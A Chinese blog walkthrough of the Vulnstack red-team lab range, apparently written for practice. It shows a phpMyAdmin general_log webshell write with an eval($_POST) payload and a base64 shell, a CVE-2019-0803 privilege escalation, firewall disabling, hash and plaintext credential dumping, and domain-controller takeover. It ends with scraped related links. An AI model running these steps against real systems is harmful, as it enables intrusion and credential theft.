[渗透测试]ATTCK实战 | Vulnstack 红队(一)
文章目录
- 写在前面
- 拿下webshell
- 简单信息搜集
- CS上线
- 继续信息搜集
- 提权
- 攻击域-接管整个域
- 完结撒花
- 题外操作
- 其他拿webshell姿势
- 修改模板拿shell
- 插件上传拿shell
@Author:Y4tacker
写在前面
无聊,再玩一个靶场,顺便记录下,也学了一些新东西,当然我觉得我的整个过程还是很有逻辑性的
拿下webshell
打开网站以后发现是个php探针,没啥意义,除了试一试弱口令
同时使用dirsearch扫描
发现有phpmyadmin,尝试为弱口令root\root
查询SHOW VARIABLES LIKE "%SECURE%"
发现配置未开启,那么不能使用into outfile写马进去
SHOW VARIABLES LIKE "%general%"
发现·general_log
·未开启了,那么开启了改日志路径写马即可
执行set global general_log_file="C:/phpStudy/WWW/1.php"
执行SET GLOBAL general_log='on'
接下来执行SELECT '<?php eval($_POST[1]);?>
连接成功,执行命令
但是现在有个很尴尬的问题,就是有其他字符不能用蚁剑连接,那制作一个干净的shell
那么执行1=file_put_contents("y4tacker.php",base64_decode("PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8%2B"));
简单信息搜集
接下来去蚁剑终端执行命令收集下信息
C:\phpStudy\WWW> whoami
god\administrator
执行ipconfig
,发现两个网卡,一个内网一个外网
查看当前登录域及登录用户信息
C:\phpStudy\WWW> net config Workstation
计算机名 \\STU1
计算机全名 stu1.god.org
用户名 Administrator
工作站正运行于 NetBT_Tcpip_{4DAEBDFD-0177-4691-8243-B73297E2F0FF} (000C29E78EDC)NetBT_Tcpip_{55ECD929-FBB2-4D96-B43D-8FFEB14A169F} (000C29E78EE6)NetBT_Tcpip_{EC57C4EB-763E-4000-9CDE-4D7FF15DF74C} (02004C4F4F50)
软件版本 Windows 7 Professional
工作站域 GOD
工作站域 DNS 名称 god.org
登录域 GOD
发现有三台工作主机
工作站域为god
,域DNS名称god.org
看看域控
C:\phpStudy\WWW> net group "domain controllers" /domain
这项请求将在域 god.org 的域控制器处理。
组名 Domain Controllers
注释 域中所有域控制器
成员
-------------------------------------------------------------------------------
OWA$
以及查看域管
C:\phpStudy\WWW> net group "domain admins" /domain
这项请求将在域 god.org 的域控制器处理。
组名 Domain Admins
注释 指定的域管理员
成员
-------------------------------------------------------------------------------
Administrator OWA$
查看域成员,没结果那么等下cs上线好了,这个终端不太好用
C:\phpStudy\WWW> net view /domain:god
结果是
CS上线
创建一个监听器
搞一个马,准备上线了
利用蚁剑上传执行
上线成功
继续信息搜集
查看主机名
shell hostname
查看用户列表
shell net users
shell net localgroup administrators得到
Administrator
liukaifeng01
命令成功完成。
提权
接下来提权吧
通过执行systeminfo
修补程序: 安装了 4 个修补程序。 [01]: KB2534111 [02]: KB2999226 [03]: KB958488 [04]: KB976902
尝试
shell CVE-2019-0803.exe cmd "start web.exe"
成功
接下里看看
shell tasklist
并没有开启啥防护软件
查看防火墙状态,执行发现开启了不截图了
shell netsh firewall show state
关闭防火墙
shell netsh advfirewall set allprofiles state off
攻击域-接管整个域
查看当前域内计算机列表
net view
看到成功列出
查看域控列表
net dclist
抓取凭证
hashdump
获得明文
logonpasswords
部分截图
创建smb监听器
拿下了OWA域控
同理,不过这次session换成刚拿下的OWA
完结撒花
整个域沦陷
题外操作
其他拿webshell姿势
额,我们也进去看到了目录,不仅仅有phpmyadmin,可以看到这里还有一个之前扫描仪没扫到的yxcms
beifen.rar
真有你的
访问看到后台地址与密码
后台访问http://xxx/yxcms/?r=admin
修改模板拿shell
看到修改模板的闭着眼睛都知道怎么搞
测试下没毛病
插件上传拿shell
首先经过我的简单测试是有一些小校验的,小问题,导出他自己的插件并点击卸载
简简单单测试个phpinfo();
修改上传,拿下,太简单了没啥意义的东西
然后呢看看源码也是很简单的,包括zip目录校验啥的不解读了,没过率
[渗透测试]ATTCK实战 | Vulnstack 红队(一)相关推荐
- [VulnStack] ATTCK实战系列—红队实战(二)
文章目录 0x00 环境搭建 0x01 信息收集 端口探测 目录扫描 0x02 漏洞利用 0x03 内网收集 主机信息搜集 域信息收集 内网漏洞扫描 0x04 横向渗透 MS17-010 PsExec ...
- ATTCK实战系列——红队实战(—)
ATT&CK实战系列--红队实战(-) 文章目录 ATT&CK实战系列--红队实战(-) 前言 一.环境搭建 1.1 靶场下载 1.2 网卡配置 二.外网渗透 三.内网渗透 1. 尝试 ...
- ATTCK实战系列——红队实战(五)
ATT&CK实战系列--红队实战(五) 文章目录 ATT&CK实战系列--红队实战(五) 前言 靶场搭建 网络配置 外网渗透 内网渗透 内网信息收集 msf反弹shell 设置路由 探 ...
- ATTCK实战系列——红队实战(一)
文章目录 环境搭建 渗透测试部分 phpmyadmin 日志 getshell yxcms 前端 XSS 任意文件写入 getshell 任意文件删除 后渗透阶段 域控信息收集 域外信息收集与渗透 3 ...
- ATTCK实战系列-红队评估(三)WP
环境搭建 靶机下载地址 http://vulnstack.qiyuanxuetang.net/vuln/detail/5/ 将虚拟机下载下来后按照官方说明配置好网络环境即可开始测试 渗透流程 0x01 ...
- ATTCK实战系列—红队实战-4
0.靶场介绍 靶场下载.配置参考:http://vulnstack.qiyuanxuetang.net/vuln/detail/6/ 靶场配置后需要自行开启 vulhub 里面的三个漏洞. 1.信息收 ...
- ATTCK实战系列 —— 红队实战(三)
环境准备 网络拓扑图 外网网段:172.26.239.0/24 内网网段:192.168.93.0/24 主机 外网 内网 Centos 172.26.239.89 192.168.93.100 Ub ...
- 记ATTCK实战系列——红队实战(三)红日靶场
以下操作均在测试环境进行,遵章守法 靶场镜像地址:http://vulnstack.qiyuanxuetang.net/vuln/detail/5/ 20G左右,分为5个虚拟机,下载之后分别解压,导进 ...
- 2021暗月web渗透测试攻防全栈红队视频教程网络安全程师ctf学习
欢迎一起交流技术学习! https://pan.baidu.com/s/1fbYGyv029oC5gf4j5FQteA?pwd=1234
- 渗透测试-信息打点(红队工具篇)
0x00 介绍 finger项目(fofa&&350queke) 知道创宇:kunyu项目(zoomeye&&seebug) ARL灯塔项目:资产灯塔项目 自动化信息收 ...
最新文章
- Blender写实建筑场景制作学习教程 Exterior Visualization in Blender 2.9
- php手机定位导航,js实现网页定位导航功能
- 测试人员的独特价值体会
- linux c printf 不能输出
- python中main的作用_浅析python 中__name__ = '__main__' 的作用
- 【cJSON】CJSON学习笔记(二)
- 使用maven导入任意jar包
- 从编程语言排行来看:C/C++一直占有前三之位,为何C++不会消亡?
- Delphi中Sender对象的定义
- 19.1.27 laravel框架学习笔记
- Sublime Text 3 插件和python环境
- 语音 AI 技术简介
- 小朋友适合读增广贤文么,增广贤文适合多大的孩子看?
- Vector、Sort课后题解
- 微信小程序:简单舒服新UI装逼制作神器
- 如何计算用户生命周期天数?
- 计算机组成原理静态存储器实验报告,静态随机存储器实验报告计算机组成原理...
- mysql导入数据库之后触发器没有权限_MYSQL设置触发器权限问题的解决方法
- 树与图在索引上的区别
- 闲话复数(1) | 不现实的虚数 i 为什么虚?它长成什么样?
热门文章
- 笔记本打印机显示服务器脱机,打印机显示脱机状态怎么办 打印机显示脱机状态解决方法【详解】...
- 基于Java实现的毕业设计论文选题系统
- 公共场合的wifi 靠不住
- 帝国cms后台界面修改方法 最新版教程
- BP反向传播算法原理及公式推导
- java 组合问题_java数组排列组合问题汇总
- 计算机死机的重启方法,电脑死机怎么强制重新启动
- python通过周数得到日期_python中根据时间获取周数,通过周数获取时间
- JAVA日期转换函数(包括:日期、周数的计算)
- 利用Oracle RDA( Remote Diagnostic Agent)快速收集Oracle产品分析数据